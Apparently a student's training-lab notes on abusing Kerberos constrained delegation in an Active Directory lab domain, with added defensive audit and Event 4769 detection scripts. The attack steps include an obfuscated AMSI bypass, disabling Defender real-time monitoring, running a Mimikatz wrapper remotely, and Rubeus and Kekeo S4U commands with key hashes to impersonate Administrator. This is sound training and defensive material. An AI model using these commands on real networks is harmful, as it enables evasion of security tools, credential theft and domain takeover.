We are going to start by enumerating users with constrained delegation ->

```powershell
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
. C:\AD\Tools\PowerView.ps1
Get-DomainUser -TrustedToAuth
```
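The same enumeration, written as an audit script rather than a PowerView one-liner, is an added example that is not part of the original notes. It uses only `[ADSISearcher]` so it runs on any domain-joined host without PowerView or RSAT, reports for each delegating account whether protocol transition ("use any authentication protocol") is enabled and which target SPNs it may delegate to, and, as a second check, lists admin accounts (adminCount=1) that are still missing the "Account is sensitive and cannot be delegated" flag, which is the setting that stops the impersonation shown on this page. The SPN regex and the `-SearchBase` parameter are assumptions for illustration.

```powershell
# Added audit example (not from the original notes): enumerate Kerberos constrained
# delegation with [ADSISearcher] only. Assumed: run as any domain user; SearchBase
# defaults to the current domain when not supplied.

$TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # userAccountControl bit: protocol transition allowed
$NOT_DELEGATED                  = 0x100000    # userAccountControl bit: "sensitive and cannot be delegated"

function New-Searcher {
    param([string]$Filter, [string[]]$Properties, [string]$SearchBase)
    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    if ($SearchBase) { $searcher.SearchRoot = [ADSI]$SearchBase }   # e.g. 'LDAP://DC=dollarcorp,DC=moneycorp,DC=local'
    $searcher.PageSize = 500
    $searcher.Filter   = $Filter
    foreach ($p in $Properties) { [void]$searcher.PropertiesToLoad.Add($p) }
    return $searcher
}

function Get-ConstrainedDelegationAudit {
    # Every user or computer with msDS-AllowedToDelegateTo populated is a constrained-delegation account.
    param([string]$SearchBase)
    $searcher = New-Searcher -SearchBase $SearchBase `
        -Filter '(&(|(objectCategory=person)(objectCategory=computer))(msDS-AllowedToDelegateTo=*))' `
        -Properties 'sAMAccountName','userAccountControl','msDS-AllowedToDelegateTo'

    foreach ($result in $searcher.FindAll()) {
        $uac     = [int]$result.Properties['useraccountcontrol'][0]
        $targets = @($result.Properties['msds-allowedtodelegateto'] | ForEach-Object { "$_" })
        # Assumed watch pattern: file, directory, host and SQL services are where delegation hurts most.
        $sensitive = @($targets | Where-Object { $_ -match '^(cifs|ldap|host|http|mssqlsvc)/' })
        [pscustomobject]@{
            Account            = $result.Properties['samaccountname'][0]
            ProtocolTransition = [bool]($uac -band $TRUSTED_TO_AUTH_FOR_DELEGATION)   # equivalent of -TrustedToAuth
            DelegatesTo        = $targets -join '; '
            SensitiveTargets   = $sensitive -join '; '
        }
    }
}

function Get-UnprotectedAdminAccounts {
    # Admin accounts (adminCount=1) that can still be impersonated through delegation:
    # the NOT_DELEGATED bit is clear. LDAP matching rule 1.2.840.113556.1.4.803 tests a single bit.
    param([string]$SearchBase)
    $filter   = "(&(objectCategory=person)(adminCount=1)(!(userAccountControl:1.2.840.113556.1.4.803:=$NOT_DELEGATED)))"
    $searcher = New-Searcher -SearchBase $SearchBase -Filter $filter -Properties 'sAMAccountName','memberOf'
    foreach ($result in $searcher.FindAll()) {
        $groups = @($result.Properties['memberof'] | ForEach-Object { "$_" })
        [pscustomobject]@{
            Account          = $result.Properties['samaccountname'][0]
            InProtectedUsers = [bool]($groups | Where-Object { $_ -like 'CN=Protected Users,*' })
        }
    }
}

Get-ConstrainedDelegationAudit | Format-Table -AutoSize
Get-UnprotectedAdminAccounts   | Where-Object { -not $_.InProtectedUsers } | Format-Table -AutoSize
```

An account such as websvc showing `ProtocolTransition = True` together with a `cifs/` target is exactly the combination the rest of these notes abuse; the remediation is either to remove protocol transition, or to put the privileged users in Protected Users or set the "cannot be delegated" flag so the S4U2Self ticket for them is unusable.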
We can either use Kekeo or Rubeus to abuse that.
Let's start with Rubeus -> first we need to encode "s4u" with Argsplit.
Since I'm not very meticulous, I didn't note websvc's secrets, so I need to do it again ->

```powershell
PS C:\AD\Tools> S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
PS C:\AD\Tools> . .\PowerView.ps1
PS C:\AD\Tools> . .\PowerUp.ps1
PS C:\AD\Tools> Copy-Item C:\AD\Tools\Invoke-MimiEx.ps1 \\dcorp-adminsrv.dollarcorp.moneycorp.local\c$\'Program Files'
PS C:\AD\Tools> Enter-PSSession dcorp-adminsrv
[dcorp-adminsrv]: PS C:\Users\student613\Documents> Set-MpPreference -DisableRealtimeMonitoring $true -Verbose
VERBOSE: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'.
[dcorp-adminsrv]: PS C:\Users\student613\Documents> cd 'C:\Program Files\'
[dcorp-adminsrv]: PS C:\Program Files> .\Invoke-MimiEx.ps1
```
Now let's launch Rubeus with s4u encoded:

```cmd
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:websvc /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL" /ptt
```

In the course there's an error in the server name: it is dcorpmssql and not dcorp-mssql.
And now we can access dcorp-mssql:
Now we're going to abuse Constrained Delegation using websvc with Kekeo.
Let's use the tgt::ask module from kekeo to request a TGT for websvc. Note that we are using the NTLM hash of websvc here just to show that an NTLM hash can be used too:

```powershell
cd .\kekeo\x64
.\kekeo.exe
```

```
tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /rc4:cc098f204c5887eaa8253e7c2749156f
```

Now, let's use this TGT and request a TGS. Note that we are requesting a TGS to access cifs/dcorp-mssql as the domain administrator - Administrator ->

```
tgs::s4u /tgt:TGT_websvc@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:cifs/dcorp-mssql.dollarcorp.moneycorp.LOCAL
```

Now we can inject the ticket into the current session to use it.
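Both the Rubeus s4u flow above and the kekeo tgt::ask / tgs::s4u flow end with the same S4U2Proxy request at the domain controller, and that is where a defender sees them: the DC's Security log records a Kerberos service ticket request (Event ID 4769) whose "Transited Services" field names the delegating account, a field that stays "-" for ordinary ticket requests. The following detection routine is an added example, not part of the original notes or of either tool. The four events are constructed sample data shaped like 4769 EventData fields (the IP addresses are made up), and the `$PrivilegedUsers` watchlist is an assumption to extend for your own environment.

```powershell
# Added detection example (not from the original notes): flag 4769 service-ticket
# requests that passed through constrained delegation (Transited Services populated)
# and whose impersonated user is on a privileged watchlist.

$PrivilegedUsers = @('Administrator')   # assumption: Tier-0 / Domain Admins watchlist

# Constructed sample events, not real lab log lines. Field names follow the 4769 EventData schema.
$SampleEvents = @(
    # ordinary TGS request by websvc for itself: no delegation chain
    @{ TargetUserName = 'websvc@DOLLARCORP.MONEYCORP.LOCAL';        ServiceName = 'krbtgt';       TransitedServices = '-';                                   IpAddress = '::ffff:172.16.100.1' },
    # ticket for Administrator to the dcorp-mssql service, obtained through websvc (S4U2Proxy)
    @{ TargetUserName = 'Administrator@DOLLARCORP.MONEYCORP.LOCAL'; ServiceName = 'dcorp-mssql$'; TransitedServices = 'websvc@DOLLARCORP.MONEYCORP.LOCAL'; IpAddress = '::ffff:172.16.100.1' },
    # a non-privileged user delegated the same way: worth logging, not paging
    @{ TargetUserName = 'student613@DOLLARCORP.MONEYCORP.LOCAL';    ServiceName = 'dcorp-mssql$'; TransitedServices = 'websvc@DOLLARCORP.MONEYCORP.LOCAL'; IpAddress = '::ffff:172.16.100.2' },
    # plain user ticket to the DC: no delegation chain
    @{ TargetUserName = 'student613@DOLLARCORP.MONEYCORP.LOCAL';    ServiceName = 'dcorp-dc$';    TransitedServices = '-';                                   IpAddress = '::ffff:172.16.100.2' }
)

function Find-DelegatedTickets {
    param([object[]]$Events, [string[]]$Watchlist = $PrivilegedUsers)
    foreach ($e in $Events) {
        # "-" (or an empty value) means no delegation chain was involved in issuing this ticket.
        if (-not $e.TransitedServices -or $e.TransitedServices -eq '-') { continue }
        $user = ($e.TargetUserName -split '@')[0]
        [pscustomobject]@{
            ImpersonatedUser = $user
            DelegatedBy      = $e.TransitedServices
            TargetService    = $e.ServiceName
            ClientAddress    = $e.IpAddress
            Privileged       = ($Watchlist -contains $user)
        }
    }
}

function ConvertFrom-4769Event {
    # Turns a live Security-log record into the same hashtable shape as $SampleEvents.
    param([System.Diagnostics.Eventing.Reader.EventLogRecord]$Record)
    $xml  = [xml]$Record.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    return $data
}

# Against the constructed sample: two delegated tickets, one of them for a privileged user.
$hits = Find-DelegatedTickets -Events $SampleEvents
$hits | Format-Table -AutoSize
$hits | Where-Object Privileged | ForEach-Object {
    Write-Warning ("Privileged user {0} reached {1} via constrained delegation through {2} from {3}" -f `
        $_.ImpersonatedUser, $_.TargetService, $_.DelegatedBy, $_.ClientAddress)
}

# Live use on a DC (assumed to be run with rights to read the Security log):
# Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4769 } |
#     ForEach-Object { ConvertFrom-4769Event $_ } | Find-DelegatedTickets | Where-Object Privileged
```

The alert condition is deliberately narrow (delegation chain present and impersonated user privileged) so it stays quiet for legitimate constrained delegation; pair it with the audit of which accounts are allowed to delegate at all, since a delegated ticket for a Tier-0 user should simply never be issuable if those users carry the "cannot be delegated" flag.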
(will finish kekeo later)
Now we're going to abuse Constrained Delegation using dcorp-adminsrv with Rubeus
We have the AES keys of dcorp-adminsrv$ from dcorp-adminsrv machine